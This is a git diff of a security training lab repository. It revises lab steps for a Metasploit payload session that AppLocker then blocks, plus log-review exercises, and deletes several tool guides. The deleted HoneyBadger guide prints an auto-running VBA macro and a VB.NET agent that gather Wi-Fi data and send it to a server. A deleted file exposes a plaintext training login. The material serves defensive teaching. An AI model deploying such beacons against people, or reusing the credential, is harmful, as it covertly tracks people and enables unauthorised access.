-<pre>set LHOST [Your Linux IP Address]</pre>
+```bash
+set LHOST [Your Linux IP Address]
+```
 
 **REMEMBER - YOUR IP WILL LIKELY BE DIFFERENT!**
 
 Go ahead and run the exploit:
 
-<pre>exploit</pre>
+```bash
+exploit
+```
 
 It should look like this:
 
-![](attachments/msf6commands.png)
+<img width="671" height="192" alt="2026-02-23_10-54" src="https://github.com/user-attachments/assets/4c40211d-7f95-48df-bff5-4a62c261d620" />
+
 
 Let’s download the malware and run it!
 
-Open a **Windows** command prompt. Do this by clicking on the icon in the taskbar.
+Going back to our **Powershell** terminal, copy the file over from **Linux**
+
+```ps
+cd .\Desktop\
+```
 
-![](attachments/OpeningWindowsCommandPrompt.png) 
+```ps
+scp ubuntu@linux.cloudlab.lan:/tmp/TrustMe.exe .
+```
+
+Open a **Windows** command prompt. 
+
+<img width="74" height="91" alt="Screenshot From 2026-02-07 17-59-56" src="https://github.com/user-attachments/assets/86cb26ca-748a-4d29-9d5b-cdc31d22ca3a" />
 
 Once the prompt is open, let's run the following commands to run the **"TrustMe.exe"** file.
 
-<pre>cd \</pre>
+```cmd
+cd \Users\Administrator\Desktop
+```
+ 
+Then run it with the following:
+
+```cmd
+TrustMe.exe
+```
+
+<img width="407" height="85" alt="Screenshot From 2026-02-23 11-05-02" src="https://github.com/user-attachments/assets/d49eec4b-9798-4069-8728-2b5373fbd569" />
 
-<pre>TrustMe.exe</pre>
 
-![](attachments/runtrustme.png)
+Back at your **Linux** terminal, you should now have a **metasploit** session!
 
-Back at your **Kali** terminal, you should now have a **metasploit** session!
+<img width="985" height="391" alt="2026-02-23_11-06" src="https://github.com/user-attachments/assets/1cc56b49-784c-4160-b042-7aacda9a5f75" />
 
-![](attachments/meterpretersession.png)
 
 Let’s stop this from happening!
 
@@ -164,51 +204,70 @@ To do this you will need to select **AppLocker** on the far left pane.  You will
 
 ![](attachments/ruleenforcement.png)
 
-We will need to start the **"Application Identity service"**.  This is done through pressing the Windows key and typing **"Services"**.  
+We will need to start the **"Application Identity service"**.  This is done through this **cmd** command, open **Command Prompt**:
 
-![](attachments/services.png)
+<img width="74" height="91" alt="Screenshot From 2026-02-07 17-59-56" src="https://github.com/user-attachments/assets/50e871b5-a3ec-4c55-92dd-db5fd4a1e1d4" />
 
-This will bring up the **Services App**.  Double-click **“Application Identity”**.
 
-![](attachments/applicationidentity.png)
+```cmd
+powershell sc start AppIDSvc
+```
 
-Once the **"Application Identity Properties"** dialog is open, please press the **Start** button.  This will start the service.
 
-![](attachments/startservice.png)
+Run **"gpupdate"** to force the policy change.
 
-Open a command prompt and run **"gpupdate"** to force the policy change.
 
-![](attachments/OpeningWindowsCommandPrompt.png)
-
-<pre>gpupdate /force</pre>
+```bash
+gpupdate /force
+```
 
 We are now going to try to run **"TrustMe.exe"** as another user on the system. 
 
 Run the following commands:
 
-<pre>cd /IntroLabs</pre>
+```cmd
+cd /IntroLabs
+```
 
-<pre>runas /user:whitelist "nc"</pre>
+```cmd
+runas /user:whitelist "C:\Tools\ncat.exe"
+```
 
 The password is **adhd**
 
-![](attachments/runas.png)
+<img width="943" height="111" alt="2026-02-23_11-42" src="https://github.com/user-attachments/assets/c6e06507-fb1c-4e49-8f09-20f44f1ec5c0" />
 
 As you can see, an error was generated, meaning that we were successful!
 
-***
-***Continuing on to the next Lab?***
 
-[Click here to get back to the Navigation Menu](/IntroClassFiles/navigation.md)
+***                                                                 
 
-***Finished with the Labs?***
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/Bluespawn.md)</i></b>
+
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
 
+***Finished with the Labs?***
 
 Please be sure to destroy the lab environment!
 
 [Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
 
-[Return To Lab List](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/navigation.md)
 
----
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
 
diff --git a/IntroClassFiles/Tools/IntroClass/Connectsecure.md b/IntroClassFiles/Tools/IntroClass/Connectsecure.md
deleted file mode 100644
index 94ca1562..00000000
--- a/IntroClassFiles/Tools/IntroClass/Connectsecure.md
+++ /dev/null
@@ -1,10 +0,0 @@
-Please go to: https://rightofboom.mycybercns.com/me/rightofboom
-
-And...  
-
-Login
-
-ID = training@rightofboom.com
-PW = RightOfBoom#321 
-
-Login and check it out.
diff --git a/IntroClassFiles/Tools/IntroClass/DenyHosts.md b/IntroClassFiles/Tools/IntroClass/DenyHosts.md
deleted file mode 100644
index 24e5fdaa..00000000
--- a/IntroClassFiles/Tools/IntroClass/DenyHosts.md
+++ /dev/null
@@ -1,88 +0,0 @@
-
-DenyHosts
-=========
-
-Website
--------
-
-<https://github.com/denyhosts/denyhosts>
-
-Description
------------
-
-DenyHosts is a utility developed by Phil Schwartz and maintained by a number of developers which aims
-to thwart sshd (ssh server) brute force attacks. Upon discovering a repeatedly malicious host, the `/etc/hosts.deny` 
-file is updated to prevent future break-in attempts from that host.
-
-
-Install Location
-----------------
-`/opt/denyhosts`
-
-`/usr/share/denyhosts/`
-
-Example 1: Installing DenyHosts
--------------------------------
-
-`~$` **`wget https://github.com/denyhosts/denyhosts/releases/download/v3.1/DenyHosts-3.1.2.tar.gz`**
-
-`~$` **`tar zxvf DenyHosts-3.1.tar.gz`**
-
-The rest of the install process requires elevated privileges. You can either switch to root, or run the 
-following commands with `sudo`.
-
-`~#` **`mv DenyHosts-3.1 /opt`**
-
-`~#` **`cd /opt/DenyHosts-3.1`**
-
-`~#` **`python3 setup.py install`**
-
-`~#` **`cp denyhosts.conf /etc`**
-
-`~#` **`cp denyhosts.py /usr/bin`**
-
-It really doesn't get much simpler than that.
-
-Example 2: Enabling DenyHosts
------------------------------
-
-To enable DenyHosts, simply start its service.
-
-`~$` **`sudo /opt/denyhosts/daemon-control start`**
-
-This command launces DenyHosts and runs it in the background. The /etc/denyhosts.conf
-file can be edited to configure its behavour.
-
-Example 3: Basic Configuration
-------------------------------
-
-A majority of DenyHosts’ configurations can be made by editing the configuration file 
-`/etc/denyhosts.conf`.
-
-DenyHosts makes use of the default Linux whitelist and blacklist.
-
-With a blacklisting service like DenyHosts it can be incredibly important to properly configure 
-your whitelist prior to launch.  
-
-The default whitelist file for Linux is `/etc/hosts.allow` (this can be changed in the DenyHosts conf file).  
-
-The rule structure is the same for the files `/etc/hosts.deny` (blacklist) and `/etc/hosts.allow` (whitelist).
-
-The pattern is `<service> : <host>`
-
-You will have to be root to run any of the following commands by default.
-
-So for example, if you wanted to allow access to a vsftp service for connections from ‘192.168.1.1’:
-
-`~$` **`sudo su`**
-
-`~#` **`echo “vsftpd : 192.168.1.1” >> /etc/hosts.allow`**
-
-To whitelist a specific host’s connection to all services (example: 192.168.1.1):
-
-`~#` **`echo “ALL : 192.168.1.1” >> /etc/hosts.allow`**
-
-The `ALL` selector can also be used to whitelist or blacklist all hosts on a specific service:
-
-`~#` **`echo “sshd : ALL” >> /etc/hosts.allow`**
-
diff --git a/IntroClassFiles/Tools/IntroClass/DenyHosts_files/drats.png b/IntroClassFiles/Tools/IntroClass/DenyHosts_files/drats.png
deleted file mode 100644
index 86da864e..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/DenyHosts_files/drats.png and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/DenyHosts_files/drats_1.PNG b/IntroClassFiles/Tools/IntroClass/DenyHosts_files/drats_1.PNG
deleted file mode 100644
index 86da864e..00000000
Binary files a/IntroClassFiles/Tools/IntroClass/DenyHosts_files/drats_1.PNG and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/DomainLogReview/DomainLogReview.md b/IntroClassFiles/Tools/IntroClass/DomainLogReview/DomainLogReview.md
index baf65773..b6a58855 100644
--- a/IntroClassFiles/Tools/IntroClass/DomainLogReview/DomainLogReview.md
+++ b/IntroClassFiles/Tools/IntroClass/DomainLogReview/DomainLogReview.md
@@ -11,17 +11,21 @@ We are going to use **DeepBlueCLI** to see if there are any odd logon patterns i
 
 Let's start by opening **Windows Powershell**:
 
-![](attachments/OpeningPowershell.png)
+<img width="74" height="91" alt="image" src="https://github.com/user-attachments/assets/5676575e-6ba5-4971-b1de-68d60234af47" />
 
-Then, navigate to the \IntroLabs\DeepBlueCLI-master directory
+Then, navigate to the `\IntroLabs\DeepBlueCLI` directory
 
-<pre>cd \IntroLabs\DeepBlueCLI-master\</pre>
+```bash
+cd \IntroLabs\DeepBlueCLI\
+```
 
 ![](attachments/dlr_directory.png)
 
 Now, let's start looking at the **DC2 Password spray** file:
 
-<pre>.\DeepBlue.ps1 .\EntLogs\DC2-secLogs-3-26-DomainPasswordSpray.evtx</pre>
+```bash
+.\DeepBlue.ps1 .\EntLogs\DC2-secLogs-3-26-DomainPasswordSpray.evtx
+```
 
 If a warning pops up, press **"R"**.  This will start the script by running it:
 When this runs, there is an alert that catches our attention right away:
@@ -34,11 +38,11 @@ Lets dig into the actual logs and see if we can see a pattern.
 
 To do this, open File Explorer and navigate to the C:\IntroLabs\DeepBlueCLI-master\EntLogs directory:
 
-![](attachments/OpeningFileExplorer.png)
+<img width="534" height="48" alt="OpenFileExplorer" src="https://github.com/user-attachments/assets/bd5ac519-825a-4921-bed6-3b8baf52a4b7" />
 
-![](attachments/Navintolabs.png)
+![](attachments/Navintolabs.png)  
 
-![](attachments/NavtoDBMaster.png)
+<img width="658" height="66" alt="image" src="https://github.com/user-attachments/assets/7dfe1e7b-f655-493d-a51a-f6dabf13ffea" />
 
 ![](attachments/navtoent.png)
 
@@ -93,3 +97,6 @@ Please be sure to destroy the lab environment!
 
 ---
 
+
+
+
diff --git a/ASA-syslogs.txt b/IntroClassFiles/Tools/IntroClass/FirewallLog/ASA-syslogs.txt
similarity index 100%
rename from ASA-syslogs.txt
rename to IntroClassFiles/Tools/IntroClass/FirewallLog/ASA-syslogs.txt
diff --git a/IntroClassFiles/Tools/IntroClass/FirewallLog/FirewallLog.md b/IntroClassFiles/Tools/IntroClass/FirewallLog/FirewallLog.md
index f4ffbeab..47643b0b 100644
--- a/IntroClassFiles/Tools/IntroClass/FirewallLog/FirewallLog.md
+++ b/IntroClassFiles/Tools/IntroClass/FirewallLog/FirewallLog.md
@@ -3,35 +3,32 @@
 
 # Firewall Log Review
 
+# Ubuntu VM
+
 In this lab we will be looking at a log with r-base-core from an **ASA firewall** from Cisco. 
 
 **And wow....  They are bad to work with.**
 
 With the power of **Bash scripting** we can get some useful information.
 
-Let’s get started by opening a **Kali** Instance.
-
-![](attachments/OpeningKaliInstance.png)
-
-Alternatively, you can click on the **Kali Logo** in the taskbar.
-
-![](attachments/TaskbarKaliIcon.png)
-
-Let's start by gaining root access by running the following:
-
-<pre>sudo su -</pre>
-
 Next, let's get your **Linux** system to do some math!
 
+Open a terminal
+
 We need to navigate to the correct directory with the following command:
 
-<pre>cd /opt/firewall_log</pre>
+```bash
+cd ~/Intro_To_SOC/firewall_log
+```
 
 Let's look into the logs.  The logs file is quite extensive, so in order to narrow our scope, we will use **"grep".**
 
-<pre>grep 192.168.1.6 ASA-syslogs.txt | grep -v 24.230.56.6 | less</pre>
+```bash
+grep 192.168.1.6 ASA-syslogs.txt | grep -v 24.230.56.6 | less
+```
+
+<img width="1919" height="1061" alt="2026-03-23_12-17" src="https://github.com/user-attachments/assets/ad255b73-60b0-4bbb-92c1-e33039d56e19" />
 
-![](attachments/fwlr_lessasa.png)
 
 **That is a nightmare...**
 
@@ -41,13 +38,16 @@ No worries though, just hit **"q"** to return to your terminal.
 
 Let's refine the output a little more by running the following command:
 
-<pre>grep 192.168.1.6 ASA-syslogs.txt | grep -v 24.230.56.6 | grep FIN | cut -d ' ' -f 1,3,4,5,7,8,9,10,11,12,13,14</pre>
+```bash
+grep 192.168.1.6 ASA-syslogs.txt | grep -v 24.230.56.6 | grep FIN | cut -d ' ' -f 1,3,4,5,7,8,9,10,11,12,13,14
+```
 
 This command focuses on the closed connections **(FIN)** and pull just specific fields out of the data to clean it up.   We use cut with the **"-d"** switch to specify the delimiter, which is a space.  Then, we tell it what fields or columns of the output we are interested in. 
 
 When it is all put together, our output looks something like this:
 
-![](attachments/fwlr_grepFIN.png)
+<img width="1238" height="333" alt="2026-03-23_12-19" src="https://github.com/user-attachments/assets/bcb1a577-46f5-4d17-9f17-e479075f5f37" />
+
 
 It's looking a lot better, but I think we can do better. But how?
 
@@ -56,33 +56,46 @@ If you look at our previous output, you may notice that outside connections are
 
 So why don't we look at just the connections made to **"13.107.237.38"** by running the following command:
 
-<pre>grep 192.168.1.6 ASA-syslogs.txt | grep -v 24.230.56.6 | grep FIN | grep 13.107.237.38 | cut -d ' ' -f 1,3,4,5,7,8,9,10,11,12,13,14</pre>
+```bash
+grep 192.168.1.6 ASA-syslogs.txt | grep -v 24.230.56.6 | grep FIN | grep 13.107.237.38 | cut -d ' ' -f 1,3,4,5,7,8,9,10,11,12,13,14
+```
+
+<img width="1850" height="865" alt="2026-03-23_12-21" src="https://github.com/user-attachments/assets/a91d273b-fff1-4a99-b6ff-91b4d2f7ec71" />
+
 
-![](attachments/fwlr_grep13107.png)
 
 This output shows us all of the data coming from **"13.107.237.38"**
 
 Don't forget, there were also a lot of connections from **"18.160.185.174"**.  Here, let's zoom in on that IP as well:
 
-<pre>grep 192.168.1.6 ASA-syslogs.txt | grep -v 24.230.56.6 | grep FIN | grep 18.160.185.174 | cut -d ' ' -f 1,3,4,5,7,8,9,10,11,12,13,14</pre>
+```bash
+grep 192.168.1.6 ASA-syslogs.txt | grep -v 24.230.56.6 | grep FIN | grep 18.160.185.174 | cut -d ' ' -f 1,3,4,5,7,8,9,10,11,12,13,14
+```
+
+<img width="1248" height="754" alt="2026-03-23_12-24" src="https://github.com/user-attachments/assets/37716c89-26bf-4ebe-ad70-1aca4872042a" />
 
-![](attachments/fwlr_grep18160.png)
 
 Look at the last field.  See a pattern?  Is there one?  Let's see just that field!
 
-<pre>grep 192.168.1.6 ASA-syslogs.txt | grep -v 24.230.56.6 | grep FIN | grep 18.160.185.174 | cut -d ' ' -f 14</pre>
+```bash
+grep 192.168.1.6 ASA-syslogs.txt | grep -v 24.230.56.6 | grep FIN | grep 18.160.185.174 | cut -d ' ' -f 14
+```
 
 All we should see now is this:
 
-![](attachments/fwlr_f14.png)
+<img width="1594" height="901" alt="2026-03-23_12-24_1" src="https://github.com/user-attachments/assets/1ed40f1f-2518-4955-b374-f4d1215f8389" />
+
 
 Now let's do some math in that field!
 
-<pre>grep 192.168.1.6 ASA-syslogs.txt | grep -v 24.230.56.6 | grep FIN | grep 18.160.185.174 | cut -d ' ' -f 8,14 | tr : ' ' | tr / ' '  | cut -d ' ' -f 4 | Rscript -e 'y <-scan("stdin", quiet=TRUE)' -e 'cat(min(y), max(y), mean(y), sd(y), var(y), sep="\n")'</pre>
+```bash
+grep 192.168.1.6 ASA-syslogs.txt | grep -v 24.230.56.6 | grep FIN | grep 18.160.185.174 | cut -d ' ' -f 8,14 | tr : ' ' | tr / ' '  | cut -d ' ' -f 4 | Rscript -e 'y <-scan("stdin", quiet=TRUE)' -e 'cat(min(y), max(y), mean(y), sd(y), var(y), sep="\n")'
+```
  
 Your output should look something like this:
 
-![](attachments/fwlr_math.png)
+<img width="660" height="158" alt="2026-03-23_12-26" src="https://github.com/user-attachments/assets/87f020f7-c0fe-4987-913e-1c96ef9761d1" />
+
 
 There are a lot of commands you can use to alter your view of the logs.  
 
@@ -100,3 +113,5 @@ Please be sure to destroy the lab environment!
 
 ---
 
+
+
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger.md b/IntroClassFiles/Tools/IntroClass/HoneyBadger.md
deleted file mode 100644
index afa7070a..00000000
--- a/IntroClassFiles/Tools/IntroClass/HoneyBadger.md
+++ /dev/null
@@ -1,412 +0,0 @@
-![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
-
-HoneyBadger
-=========================
-
-Website
--------
-<https://github.com/adhdproject/honeybadger>
-
-
-Description
------------
-Used to identify the physical location of a web user with a combination
-of geolocation techniques using a browser's share location feature, the
-visible WiFi networks, and the IP address.
-
-
-Updates
--------
-What's new in HoneyBadger?
-
-* Updated to Python 3.x
-* API keys extracted as CLI arguments
-* New fallback geolocation APIs added (IPStack, IPInfo.io)
-* New utilities for automatic wireless surveying (Windows, Linux)
-* New beacon agents (VB.NET, VBA)
-
-
-Install Location
-----------------
-`/opt/honeybadger/`
-
-
-Usage
------
-In order to use the latest version of HoneyBadger, Python 3 must be installed, as well as python3-pip. These should both be installed on the ADHD image.
-
-`cd /opt/honeybadger/server`
-
-Finally, from the same directory, run the HoneyBadger server:
-`python3 honeybadger.py -ik <IPSTACK_KEY> -gk <GOOGLE_KEY>`
-
-
-NOTE: Though HoneyBadger will still run without API keys, functionality is severely limited without them.
-
-
-Example 1: Overview
--------------------
-The HoneyBadger UI has many features. This section will give a brief overview of HoneyBadger's pages.
-
-Please surf to http://<YOUR_LINUX_IP>:5000 
-
-PLEASE USE FIREFOX!!!!
-
-The user and password are adhd.
-
-Navigate to the HoneyBadger server, and you will be presented with the following screen:
-
-![](HoneyBadger_files/hb_login.png)
-
-Use the credentials set earlier to log in, and you will be brought to the map.
-
-To navigate to other pages of HoneyBadger, use the navigation bar in the top right corner:
-
-![](HoneyBadger_files/hb_navbar.png)
-
-### 1. Map ###
-The map is the default landing page after logging in.
-
-![](HoneyBadger_files/hb_map.png)
-
-The map is the main event of HoneyBadger in terms of presentation, and will pin a location when a beacon is triggered.
-
-### 2. Targets ###
-Navigate to the targets page.
-
-![](HoneyBadger_files/hb_targets.png)
-
-The targets page is where targets can be observed, added, or removed, The page also serves as a way to generate several agents that are not quickly generated manually.
-
-### 3. Beacons ###
-Navigate to the beacons page.
-
-![](HoneyBadger_files/hb_beacons.png)
-
-The beacons page maintains a list of beacons that connect to HoneyBadger and successfully geolocate. Beacons can be removed from this page as well.
-
-### 4. Log ###
-Navigate to the log page.
-
-![](HoneyBadger_files/hb_log_empty.png)
-
-The log page is populated with information as beacons attempt to connect to the HoneyBadger server, and may be empty if accessed before any beacons connect to the server.
-
-### 5. Profile ###
-Navigate to the profile page.
-
-![](HoneyBadger_files/hb_profile.png)
-
-The profile page allows for changing the password of the currently logged in account.
-
-### 6. Admin ###
-Navigate to the admin page.
-
-![](HoneyBadger_files/hb_admin.png)
-
-The admin page is where administrative actions can be performed on accounts, and where new accounts can be added.
-
-### 7. Logout ###
-Clicking logout on the navbar will log you out, bringing you back to the login page.
-
-![](HoneyBadger_files/hb_logout.png)
-
-NOTE: All pages containing a table of records can be sorted by clicking on the table headings.
-
-Example 2: Using the Map
------------------------------
-Navigate to the map page.
-
-![](HoneyBadger_files/hb_map.png)
-
-At its core, the map page uses the Google Maps API, and functions identically to the standard Google Maps.
-
-Several options are available for filtering map points by targets and by agents, using the map legend:
-
-![](HoneyBadger_files/hb_map_legend.png)
-
-As targets are added or unique agents are used to beacon into a target, they will show up in this legend. Toggling checkboxes in the legend enables filtering of beacons that are displayed in the map.
-
-Points on the map can be clicked to display information about the machine that beaconed in:
-
-![](HoneyBadger_files/hb_map_beacondetails.png)
-
-
-Example 3: Working with Targets
--------------------------------
-Navigate to the targets page.
-
-![](HoneyBadger_files/hb_targets.png)
-
-Take a closer look at the information associated with the demo target:
-
-![](HoneyBadger_files/hb_targets_targetinfo.png)
-
-Moving left to right:
-
-* id: list id number
-* name: name of the target
-* guid: unique id of the target
-* beacon_count: number of beacons associated with the target
-* action: available actions regarding the target
-    - macro: generate a VBA macro beacon for the target
-    - VB.NET: generate a VB.NET beacon for the target
-    - demo: navigate to the target's demo page
-    - delete: delete the target
-
-Note that clicking on any of the first four table headings will sort the table based on that column in ascending or descending order, as indicated by an arrow that appears upon clicking.
-
-To add a new target, enter the target name in the field at the top of the page, and click the add button.
-
-The new target will appear in the list:
-
-![](HoneyBadger_files/hb_targets_targetadd.png)
-
-Two agents can be generated from this page, one for VBA Office macros and one for VB.NET.
-
-Clicking on the macro button will show the macro in a popup:
-
-![](HoneyBadger_files/hb_targets_targetVBA.png)
-
-Clicking on on the VB.NET button will show the VB.NET code in a popup:
-
-![](HoneyBadger_files/hb_targets_targetVBNET.png)
-
-NOTE: Though HoneyBadger attempts to copy the code to the clipboard, it's safest to simply copy the macro by hand.
-
-To delete a target, click the target's delete button. A prompt will appear:
-
-![](HoneyBadger_files/hb_targets_targetdelete.png)
-
-Click OK, and the target will be removed from the list.
-
-
-Example 4: Working with Beacons
--------------------------------
-Navigate to the beacons page.
-
-![](HoneyBadger_files/hb_beacons.png)
-
-Take a closer look at the information associated with the first demo beacon:
-
-![](HoneyBadger_files/hb_beacons_beaconinfo.png)
-
-Moving left to right:
-
-* id: list id number
-* target: which target the beacon associated with
-* agent: the agent that the beacon used to communicate with the server
-* lat: geolocation latitude of the beacon
-* lng: geolocation longitude of the beacon
-* acc: geolocation accuracy of the beacon
-* ip: IP address of the beacon
-* created: timestamp of beacon creation
-* action: available action regarding the target
-    - delete: delete the beacon
-
-Using an agent, beacon into HoneyBadger, and refresh the beacons page to see a new beacon added to the list:
-
-![](HoneyBadger_files/hb_beacons_beaconadded.png)
-
-To delete a beacon, click the beacon's delete button. A prompt will appear:
-
-![](HoneyBadger_files/hb_beacons_beacondelete.png)
-
-Click OK, and the beacon will be removed from the list
-
-
-Example 5: Observing the Log
-----------------------------
-Navigate to the log page.
-
-![](HoneyBadger_files/hb_log.png)
-
-The log page has been populated with information after the beacon was added in Example 4. The log contains information pertaining to the beacon, and will contain information if a beacon is unable to geolocate.
-
-Example 6: Changing Profile Information
----------------------------------------
-Navigate to the profile page.
-
-![](HoneyBadger_files/hb_profile.png)
-
-To change a password, fill in the fields accordingly. Note that passwords set with the profile page must meet minimum complexity requirements of a minimum of 10 characters, of which all four character classes (uppercase letters, lowercase letters, special characters, and numbers) must be used.
-
-If the password does not meet minimum complexity requirements, the password is rejected and the user is notified:
-
-![](HoneyBadger_files/hb_profile_badcomplexity.png)
-
-Upon successful password change, the user is notified:
-
-![](HoneyBadger_files/hb_profile_profileupdated.png)
-
-Example 7: Administration
--------------------------
-Navigate to the admin page.
-
-![](HoneyBadger_files/hb_admin.png)
-
-Note that modification of the current user is not allowed. If this is attempted, the user is notified of this:
-
-![](HoneyBadger_files/hb_admin_selfmodify.png)
-
-To add a new user, enter an email address in the box above, and click initialize. The new user will appear in the list:
-
-![](HoneyBadger_files/hb_admin_useradded.png)
-
-To get an activation link to the user, click the get link button. The link will be copied to the clipboard.
-
-To delete a user, click the user's delete button. The following prompt will appear:
-
-![](HoneyBadger_files/hb_admin_userdelete.png)
-
-Click OK, and the user will be removed from the list:
-
-![](HoneyBadger_files/hb_admin_userdeleted.png)
-
-Example 8: Agents
------------------
-### 1. Demo Page ###
-Navigate to the targets page.
-
-![](HoneyBadger_files/hb_targets.png)
-
-Click on the demo button to be taken to the demo page:
-
-![](HoneyBadger_files/hb_demo.png)
-
-Enter some XSS code into the first field, and the current user's password into the second field, and click submit.
-
-If the inputted XSS code worked, the following string of popups will appear.
-
-![](HoneyBadger_files/hb_demo_locationrequest.png)
-
-Click on Share Location.
-
-![](HoneyBadger_files/hb_demo_consentprompt.png)
-
-Click OK.
-
-![](HoneyBadger_files/hb_demo_appletprompt.png)
-
-Click Allow Now.
-
-![](HoneyBadger_files/hb_demo_appletprompt_again.png)
-
-Click Run.
-
-![](HoneyBadger_files/hb_demo_appletsecurity.png)
-
-Click Yes.
-
-![](HoneyBadger_files/hb_demo_applethoney.png)
-
-Click Yes.
-
-![](HoneyBadger_files/hb_demo_applethoney_again.png)
-
-After clicking through all of the prompts, the page will load. Reload the HoneyBadger beacons page to see that a new beacon is added:
-![](HoneyBadger_files/hb_demo_jsbeacon.png)
-
-
-### 2. VBA Macro ###
-The VBA macro code are not included as comments in the generated popup for the sake of brevity. The VBA macro functionality is explained here. In short, the VBA macro imitates the powershell script.
-
-    Sub AutoOpen()
-        ' Create an instance of a WSH shell for system commands
-        Set objWSH = CreateObject("WScript.Shell")
-
-        ' Run the netsh command via powershell for automatic wireless survey
-        wifi = objWSH.Exec("powershell netsh wlan show networks mode=bssid | findstr 'SSID Signal Channel'").StdOut.ReadAll
-        
-        ' Open a file handle to a temporary file and write netsh results to file
-        Open Environ("temp") & "\wifidat.txt" For Output As #1
-            Print #1, wifi
-        Close #1
-        
-        ' Read contents in from temp file, fixing encoding issues with the web request
-        wifi = objWSH.Exec("powershell Get-Content %TEMP%\wifidat.txt -Encoding UTF8 -Raw").StdOut.ReadAll
-
-        ' Remove the temporary file
-        Kill Environ("temp") & "\wifidat.txt"
-
-        ' Base64-encode the netsh data for sending.
-        wifienc = objWSH.Exec("powershell -Command ""& {[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('" & wifi & "'))}""").StdOut.ReadAll
-
-        ' Create a web object
-        Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
-
-        ' Open the connection via POST request to the HoneyBadger server
-        objHTTP.Open "POST", "http://<SERVER>:5000/api/beacon/aedc4c63-8d13-4a22-81c5-d52d32293867/VBA"
-
-        ' Set request headers to make the server aware of the POST form data
-        objHTTP.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
-
-        ' Send the properly formatted POST form to the server
-        objHTTP.Send "os=windows&data=" & wifienc
-    End Sub
-
-To use the macro code, simply open a document, paste this macro inside, and save as a .docm file. Upon opening and accepting to run code, the macro will be triggered and the beacon will be added.
-
-
-### 3. VB.NET Script ###
-The VB.NET code is identical in function and near identical in structure to the VBA macro. Changes needed to be made to make it a valid VB.NET script, for version difference issues between VB.NET and VBA. Like the macro, the VB.NET functionality is explained here:
-
-    Imports System.IO
-    
-    Module HoneyBadgerBeacon
-        Sub Main()
-            ' Create and initialize a new WSH shell object
-            Dim objWSH As New Object
-            objWSH = CreateObject("WScript.Shell")
-
-            ' Create and initialize the wifi data variable
-            Dim wifi As String
-            wifi = objWSH.Exec("powershell netsh wlan show networks mode=bssid | findstr 'SSID Signal Channel'").StdOut.ReadAll
-            
-            ' Create a temp file
-            Dim objWriter As New System.IO.StreamWriter(Environ("temp") & "\wifidat.txt")
-            
-            ' Write data to file
-            objWriter.Write(wifi)
-
-            ' Close file
-            objWriter.Close(0)
-            
-            ' Read in the temp file contents with proper encoding
-            wifi = objWSH.Exec("powershell Get-Content %TEMP%\wifidat.txt -Encoding UTF8 -Raw").StdOut.ReadAll
-            
-            ' Delete temp file
-            Kill(Environ("temp") & "\wifidat.txt")
-
-            ' Base64-encode data
-            wifi = objWSH.Exec("powershell -Command ""& {[System.Convert]::ToBase64String([System.Text.Encoding]::UTF88.GetBytes('" & wifi & "'))}""").StdOut.ReadAll
-
-            ' Create new web object
-            Dim objHTTP As New Object
-            objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
-
-            ' Open POST request to server
-            objHTTP.Open("POST", "http://<SERVER>:5000/api/beacon/aedc4c63-8d13-4a22-81c5-d52d32293867/VB")
-
-            ' Set request headers to notify server of POST form data
-            objHTTP.setRequestHeader("Content-Type", "application/x-www-form-urlencoded")
-
-            ' Send the formatted data to the server
-            objHTTP.Send("os=windows&data=" & wifi)
-        End Sub
-    End Module
-
-Copy this script into a file with a .vb extension, and run vbc <FILENAME>.vb to compile, and then run <FILENAME>.exe to create the beacon.
-
-
-### 4. HTML ###
-To use a beacon with the HTML agent, go to the targets page and copy the GUID of the desired target, and create a URL formatted like so:
-`http://<SERVER>:5000/api/beacon/<GUID>/HTML?lat=<LAT>&lng=<LNG>&acc=<ACC>`
-
-Navigate to this page in a browser. The server will return a 404
-
-
-### 5. CMD ###
-The CMD agent is a type of HTML agent, as the beacon is created via web requests on the command line. There are two utilities in the util directory of HoneyBadger, one for windows and one for linux. They utilize Google's geolocation API. Usage information is available in those scripts. 
-
-[Return To Lab List](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/navigation.md)
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyPorts.md b/IntroClassFiles/Tools/IntroClass/HoneyPorts.md
deleted file mode 100644
index e9766bc2..00000000
--- a/IntroClassFiles/Tools/IntroClass/HoneyPorts.md
+++ /dev/null
@@ -1,193 +0,0 @@
-
-Honey Ports
-============
-
-Website
--------
-
-<https://github.com/adhdproject/honeyports>
-
-Description
------------
-
-A Python based cross-platform HoneyPort solution, created by Paul Asadoorian.
-
-Install Location
-----------------
-
-`/opt/honeyports/`
-
-Usage
------
-
-Change to the Honeyports directory and execute the latest version of the script:
-
-`~$` **`cd /opt/honeyports`**
-
-`/opt/honeyports$` **`python3 ./honeyports.py`**
-
-        
-
-Example 1: Monitoring A Port With HoneyPorts
---------------------------------------------
-
-From the honeyports directory, run:
-
-`/opt/honeyports$` **`sudo python3 ./honeyports.py -p 3389 -h localhost`**
-
-        Listening on  0.0.0.0 IP:  0.0.0.0  :  3389
-
-We can confirm that the listening is taking place with lsof:
-
-`/opt/honeyports$` **`sudo lsof -i -P | grep python`**
-
-        python   26560     root    3r  IPv4 493595      0t0  TCP *:3389 (LISTEN)
-
-Looks like we're good.
-
-Any connection attempts to that port will result in an instant ban for the IP address in question.
-Let's simulate this next.
-
-Example 2: Blacklisting In Action
----------------------------------
-
-If Honeyports is not listening on 3389 please follow the instructions in
-[Example 1: Monitoring A Port With HoneyPorts].
-
-Once you have Honeyports online and a backup Windows machine to connect to Honeyports from,
-let's proceed.
-
-First we need to get the IP address of the ADHD instance.
-
-`~$` **`ifconfig`**
-
-        eth0      Link encap:Ethernet  HWaddr 08:00:27:65:3c:64
